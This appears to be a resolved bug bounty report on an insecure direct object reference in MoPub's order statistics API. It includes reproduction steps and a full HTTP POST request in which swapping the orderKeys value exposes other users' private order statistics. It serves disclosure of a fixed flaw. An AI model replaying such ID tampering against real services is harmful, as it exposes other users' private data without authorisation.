IDOR and statistics leakage in Orders
Medium
X
X (Formerly Twitter)
Submitted None
Actions:
Reported by
updatelap
Vulnerability Details
Technical details and impact analysis
**Description:**
Twitter on its service "MoPub" statistics dedicated to the results of "Order", after the test shows that the endpoint "https://app.mopub.com/web-client/api/orders/stats/query" is infected with a "IDOR " bug
Which led to the leak of private statistics "Orders" by another users
## Steps To Reproduce:
1. [Create account in https://app.mopub.com/ and login]
1. [go to the link https://app.mopub.com/orders and create Order ]
1. [using this POST Request you can disclose statistics another orders By changing the value of the parameter __orderKeys__ in body request]
```
POST /web-client/api/orders/stats/query HTTP/1.1
Host: app.mopub.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.mopub.com/orders
Content-Type: application/json
x-csrftoken: {TOKEN}
Content-Length: 98
Connection: close
Cookie: csrftoken={TOKEN}; sessionid={SID}; mp_mixpanel__c=1;
{"startTime":"2019-04-07","endTime":"2019-04-20","orderKeys":["43b29d60a9724fa9abbdc800044002d6"]}
```
{F472873}
## Impact
__leakage statistics__
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$289.00
Submitted
Weakness
Insecure Direct Object Reference (IDOR)